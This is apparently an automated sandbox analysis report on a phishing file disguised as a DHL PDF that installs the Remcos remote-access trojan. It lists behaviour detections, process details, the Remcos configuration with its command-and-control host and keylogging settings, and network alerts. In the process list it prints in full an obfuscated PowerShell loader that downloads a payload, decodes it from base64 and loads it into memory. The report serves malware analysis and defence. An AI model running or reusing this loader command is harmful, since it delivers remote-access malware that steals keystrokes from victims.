| File name: | 17022025_1651_17022025_DHLRPAGRBPTemplate.PDF.gz |
| Full analysis: | https://app.any.run/tasks/aeeeaaa6-fca7-41fe-b432-65ace22ebfa6 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | February 17, 2025, 17:06:28 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/gzip |
| File info: | gzip compressed data, was "DHL RPA GRBP Template.PDF.js", last modified: Sun Feb 16 22:27:35 2025, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 86846 |
| MD5: | 834CEF755C9541A95DDBA2A5927D1BCC |
| SHA1: | 3446F3BD07CD739DD5F01CF236C01283ACBD8992 |
| SHA256: | F6D422F45CFDDE668B5E7229844FF8A907AD97CC218CA45DFF0747F3A79F871D |
| SSDEEP: | 48:kl20dkpD8Z9W2BtOGStbG04Dc7PXT45Hid35Uh3af2S6mT8fH1vajK+a3y6z8HS:i2ajZ9WQwG/c7/TrhClfH1vau+F48HS |
MALICIOUS
Creates internet connection object (SCRIPT)
- wscript.exe (PID: 6612)
Sends HTTP request (SCRIPT)
- wscript.exe (PID: 6612)
Generic archive extractor
- WinRAR.exe (PID: 6420)
Opens an HTTP connection (SCRIPT)
- wscript.exe (PID: 6612)
Stego campaign has been detected
- powershell.exe (PID: 6688)
Dynamically loads an assembly (POWERSHELL)
- powershell.exe (PID: 6688)
Downloads the requested resource (POWERSHELL)
- powershell.exe (PID: 6688)
REMCOS has been detected (SURICATA)
- MSBuild.exe (PID: 6328)
REMCOS has been detected (YARA)
- MSBuild.exe (PID: 6328)
SUSPICIOUS
Runs shell command (SCRIPT)
- wscript.exe (PID: 6612)
Starts POWERSHELL.EXE for commands execution
- wscript.exe (PID: 6612)
Probably download files using WebClient
- wscript.exe (PID: 6612)
Probably obfuscated PowerShell command line is found
- wscript.exe (PID: 6612)
Reads security settings of Internet Explorer
- WinRAR.exe (PID: 6420)
Executing commands from a ".bat" file
- WinRAR.exe (PID: 6420)
Starts CMD.EXE for commands execution
- WinRAR.exe (PID: 6420)
- powershell.exe (PID: 6688)
Potential Corporate Privacy Violation
- wscript.exe (PID: 6612)
Uses base64 encoding (POWERSHELL)
- powershell.exe (PID: 6688)
There is functionality for taking screenshot (YARA)
- MSBuild.exe (PID: 6328)
The process executes via Task Scheduler
- wscript.exe (PID: 3364)
Connects to unusual port
- MSBuild.exe (PID: 6328)
Contacting a server suspected of hosting an CnC
- MSBuild.exe (PID: 6328)
INFO
Manual execution by a user
- wscript.exe (PID: 6612)
Checks proxy server information
- wscript.exe (PID: 6612)
- powershell.exe (PID: 6688)
Creates or changes the value of an item property via Powershell
- wscript.exe (PID: 6612)
Create files in a temporary directory
- MpCmdRun.exe (PID: 6924)
Checks supported languages
- MpCmdRun.exe (PID: 6924)
- MSBuild.exe (PID: 6328)
Reads the computer name
- MpCmdRun.exe (PID: 6924)
- MSBuild.exe (PID: 6328)
Disables trace logs
- powershell.exe (PID: 6688)
Gets data length (POWERSHELL)
- powershell.exe (PID: 6688)
Creates files in the program directory
- MSBuild.exe (PID: 6328)
Reads the machine GUID from the registry
- MSBuild.exe (PID: 6328)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
Remcos
(PID) Process(6328) MSBuild.exe
C2 (1)meme.linkpc.net:3174
Botnetnom
Options
Connect_interval1
Install_flagFalse
Install_HKCU\RunTrue
Install_HKLM\RunTrue
Install_HKLM\Explorer\Run1
Setup_path%LOCALAPPDATA%
Copy_fileremcos.exe
Startup_valuesos
Hide_fileFalse
Mutex_namegig-G7MMFK
Keylog_flag1
Keylog_path%LOCALAPPDATA%
Keylog_filelogs.dat
Keylog_cryptTrue
Hide_keylogFalse
Screenshot_flagFalse
Screenshot_time5
Take_ScreenshotFalse
Screenshot_path%APPDATA%
Screenshot_fileScreenshots
Screenshot_cryptFalse
Mouse_optionFalse
Delete_fileFalse
Audio_record_time5
Audio_path%ProgramFiles%
Audio_dirMicRecords
Connect_delay0
Copy_dirvlc
Keylog_dirios
Max_keylog_file100000
TRiD
| .z/gz/gzip | | | GZipped data (100) |
|---|
EXIF
ZIP
| Compression: | Deflated |
|---|---|
| Flags: | FileName |
| ModifyDate: | 2025:02:16 22:27:35+00:00 |
| ExtraFlags: | Fastest Algorithm |
| OperatingSystem: | FAT filesystem (MS-DOS, OS/2, NT/Win32) |
| ArchivedFileName: | DHL RPA GRBP Template.PDF.js |
Total processes
128
Monitored processes
12
Malicious processes
3
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2008 | "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\marly.js" | C:\Windows\System32\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2192 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2996 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3364 | "wscript.exe" C:\ProgramData\marly.js | C:\Windows\System32\wscript.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 6328 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: MSBuild.exe Version: 4.8.9037.0 built by: NET481REL1 Modules
Remcos(PID) Process(6328) MSBuild.exe C2 (1)meme.linkpc.net:3174 Botnetnom Options Connect_interval1 Install_flagFalse Install_HKCU\RunTrue Install_HKLM\RunTrue Install_HKLM\Explorer\Run1 Setup_path%LOCALAPPDATA% Copy_fileremcos.exe Startup_valuesos Hide_fileFalse Mutex_namegig-G7MMFK Keylog_flag1 Keylog_path%LOCALAPPDATA% Keylog_filelogs.dat Keylog_cryptTrue Hide_keylogFalse Screenshot_flagFalse Screenshot_time5 Take_ScreenshotFalse Screenshot_path%APPDATA% Screenshot_fileScreenshots Screenshot_cryptFalse Mouse_optionFalse Delete_fileFalse Audio_record_time5 Audio_path%ProgramFiles% Audio_dirMicRecords Connect_delay0 Copy_dirvlc Keylog_dirios Max_keylog_file100000 | |||||||||||||||
| 6420 | "C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\17022025_1651_17022025_DHLRPAGRBPTemplate.PDF.gz | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | |||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.91.0 Modules
| |||||||||||||||
| 6612 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\DHL RPA GRBP Template.PDF.js" | C:\Windows\System32\wscript.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 6688 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$UUcRpCLGmLLdZKLGLZCh = '#x#.mon/ssc/sr.marolka#s//:sp##h';$khuGfWKcLCfBKPjrGWTo = $UUcRpCLGmLLdZKLGLZCh -replace '#', 't';$BokSBmcmWWtzWevWaoqx = 'https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d';$qkoqGLWpWlePGLTbGWKi = New-Object System.Net.WebClient;$UtrGGLzeWZaiUKLALckK = $qkoqGLWpWlePGLTbGWKi.DownloadData($BokSBmcmWWtzWevWaoqx);$KznfbhLAKWeixbiKOLmf = [System.Text.Encoding]::UTF8.GetString($UtrGGLzeWZaiUKLALckK);$pqGmGJhCUdHPTWoNGzoi = '<<BASE64_START>>';$fkbtKicqWUKucKZfPsGZ = '<<BASE64_END>>';$IWkjipLrkKzmLLZTWnAZ = $KznfbhLAKWeixbiKOLmf.IndexOf($pqGmGJhCUdHPTWoNGzoi);$kLqhkkloLQnlpAAWtUfc = $KznfbhLAKWeixbiKOLmf.IndexOf($fkbtKicqWUKucKZfPsGZ);$IWkjipLrkKzmLLZTWnAZ -ge 0 -and $kLqhkkloLQnlpAAWtUfc -gt $IWkjipLrkKzmLLZTWnAZ;$IWkjipLrkKzmLLZTWnAZ += $pqGmGJhCUdHPTWoNGzoi.Length;$WZWCixKGqLjWLKAblnWb = $kLqhkkloLQnlpAAWtUfc - $IWkjipLrkKzmLLZTWnAZ;$BqfbkPmiGKPWmKNxlCCR = $KznfbhLAKWeixbiKOLmf.Substring($IWkjipLrkKzmLLZTWnAZ, $WZWCixKGqLjWLKAblnWb);$izpdcONcauWPfczuWZNS = [System.Convert]::FromBase64String($BqfbkPmiGKPWmKNxlCCR);$GtULNOKhlcioutbuALkp = [System.Reflection.Assembly]::Load($izpdcONcauWPfczuWZNS);$aPozWGuWPfkczdpKSqdK = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($khuGfWKcLCfBKPjrGWTo,'','','','MSBuild','','','','','C:\ProgramData\','marly','js','1','1','pessaries'))" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6696 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6864 | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Rar$VR6420.31563\Rar$Scan8325.bat" " | C:\Windows\System32\cmd.exe | — | WinRAR.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
12 944
Read events
12 929
Write events
15
Delete events
0
Modification events
| (PID) Process: | (6420) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 3 |
Value: C:\Users\admin\Desktop\preferences.zip | |||
| (PID) Process: | (6420) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\chromium_ext.zip | |||
| (PID) Process: | (6420) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 1 |
Value: C:\Users\admin\Desktop\omni_23_10_2024_.zip | |||
| (PID) Process: | (6420) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\Desktop\17022025_1651_17022025_DHLRPAGRBPTemplate.PDF.gz | |||
| (PID) Process: | (6420) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (6420) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (6420) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
| (PID) Process: | (6420) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | mtime |
Value: 100 | |||
| (PID) Process: | (6612) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (6612) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
Executable files
0
Suspicious files
4
Text files
4
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6612 | wscript.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\FsssIAil[1].txt | text | |
MD5:421BB5FD77561C2B135314692EE10DFE | SHA256:066FCBAFF4D7FA16CF982D563EA85C1AFCF324033EE4539C46998B49C067A6A0 | |||
| 6420 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$VR6420.31563\17022025_1651_17022025_DHLRPAGRBPTemplate.PDF.gz\DHL RPA GRBP Template.PDF.js | binary | |
MD5:27CB47B5E1AC316A34E346DC787782F6 | SHA256:ABC914C82DAC8F803DF0AE50A350C38CD7AF60344F60936A6DF01198EFBB03F6 | |||
| 6328 | MSBuild.exe | C:\ProgramData\ios\logs.dat | binary | |
MD5:B06B0EA5CD34AE3FE4FC679C2887D388 | SHA256:F10686BCCFE1352D3FEC27082577BB8E3885AC2D87DB10109DD1748E1F6C0FDF | |||
| 6688 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:921588518804B4A31062A89F077CC643 | SHA256:F24A42CC0187478FF3340E9F85824A02D084C3501EC73141B3F15A416D01F930 | |||
| 6420 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$VR6420.31563\Rar$Scan8325.bat | text | |
MD5:8D62B4536AA4C6E46D221C606A0B01CD | SHA256:9F9CD0AF5BD23B74B53D4B61021DF98AC09C3DE34A70018D77E2CCC5C9D0EF86 | |||
| 6924 | MpCmdRun.exe | C:\Users\admin\AppData\Local\Temp\MpCmdRun.log | binary | |
MD5:013CF04237C1BD325B79FF296AAE78CE | SHA256:895F86B5CC9CF40DCEB6F5411FE691D7F7FE4A4817CFEA1BDBEF4E811F00584E | |||
| 6688 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ggtprgmd.vio.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6688 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lhxfqfzx.n4j.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
130
DNS requests
10
Threats
235
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
4712 | MoUsoCoreWorker.exe | GET | 200 | 2.19.11.120:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | GET | 200 | 23.209.214.100:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 178.21.23.182:443 | https://3005.filemail.com/api/file/get?filekey=nIx_5T0LxHOBjilNb9CRviabPjrW2dlC-LxeOdJPF_Z_1MP6CuQBS5KcptA&pk_vid=342803d1cc4e3b801739359203b5fe9d | unknown | image | 3.49 Mb | malicious |
— | — | GET | 200 | 37.27.124.176:443 | https://stakloram.rs/css/nom.txt | unknown | text | 626 Kb | — |
— | — | GET | 200 | 23.186.113.60:443 | https://paste.ee/d/FsssIAil | unknown | text | 3.83 Kb | shared |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4712 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
— | — | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4712 | MoUsoCoreWorker.exe | 2.19.11.120:80 | crl.microsoft.com | Elisa Oyj | NL | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
6612 | wscript.exe | 23.186.113.60:443 | paste.ee | — | — | shared |
4712 | MoUsoCoreWorker.exe | 23.209.214.100:80 | www.microsoft.com | PT. Telekomunikasi Selular | ID | whitelisted |
4712 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
2624 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
6688 | powershell.exe | 193.30.119.105:443 | 3005.filemail.com | JOTTA AS | NO | malicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
paste.ee |
| shared |
www.microsoft.com |
| whitelisted |
3005.filemail.com |
| malicious |
stakloram.rs |
| unknown |
meme.linkpc.net |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
2192 | svchost.exe | Misc activity | ET INFO Pastebin-like Service Domain in DNS Lookup (paste .ee) |
6612 | wscript.exe | Potential Corporate Privacy Violation | ET INFO Pastebin-style Service (paste .ee) in TLS SNI |
— | — | A Network Trojan was detected | SUSPICIOUS [ANY.RUN] VBS is used to run Shell |
— | — | Potentially Bad Traffic | ET INFO Base64 Encoded powershell.exe in HTTP Response M1 |
— | — | Not Suspicious Traffic | INFO [ANY.RUN] Observed File Sharing Service Download Domain (filemail.com) |
— | — | A Network Trojan was detected | PAYLOAD [ANY.RUN] Base64 encoded PE EXE file inside JPEG image |
— | — | A Network Trojan was detected | PAYLOAD [ANY.RUN] Stegocampaign Jpeg with base64 added (TA558) |
— | — | A Network Trojan was detected | ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 |
— | — | Exploit Kit Activity Detected | ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound |
— | — | Exploit Kit Activity Detected | ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 |